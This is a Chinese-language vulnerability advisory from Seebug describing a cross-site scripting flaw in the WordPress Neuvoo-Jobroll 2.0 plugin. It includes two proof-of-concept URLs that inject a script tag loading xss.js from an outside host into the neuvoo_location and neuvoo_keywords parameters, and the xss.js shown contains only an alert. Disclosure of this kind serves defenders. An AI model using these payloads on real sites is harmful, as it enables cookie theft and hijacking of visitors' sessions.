WordPress Neuvoo-Jobroll插件跨站脚本漏洞

2015-11-25T00:00:00
ID SSV:89876
Type seebug
Reporter Root
Modified 2015-11-25T00:00:00

Description

漏洞简介:

WordPress是WordPress软件基金会的一套使用PHP语言开发的博客平台,该平台支持在PHP和MySQL的服务器上架设个人博客网站。Neuvoo-Jobroll是其中的一个工作机会聚合插件。 WordPress Neuvoo-Jobroll插件中存在跨站脚本漏洞,该漏洞源于程序没有充分过滤用户提交的输入。当用户浏览受影响的网站时,其浏览器将执行攻击者提供的任意脚本代码。这可能导致攻击者窃取基于cookie的身份验证并发起其它攻击。WordPress Neuvoo-Jobroll插件2.0版本中存在漏洞,其他版本也可能受到影响。

来源:http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-201511-401

影响组件:WordPress Neuvoo-Jobroll 2.0

漏洞类型:跨站脚本 漏洞危害:攻击者可以利用这一漏洞篡改网页,获取被攻击者的cookie等。

利用方式: 攻击者可以使用GET方法的两个参数: - neuvoo_location= - neuvoo_keywords= on Firefox 41.0.2.

提交方式:

http://<URL>/<path_to_neuvoo_plugin>/index.php?neuvoo_location=France&neuvoo_keywords="><script src=https://<a website>/xss.js>&neuvoo_page=1

http://<URL>/<path_to_neuvoo_plugin>/index.php?neuvoo_location="><script src=https://<a website>/xss.js>&neuvoo_keywords=Pentester&neuvoo_page=1

“xss.js”包含以下字段:

window.onload = function(){ alert("XSS - Mickael Dorigny @MickaelDorigny - Synetis"); };

截图: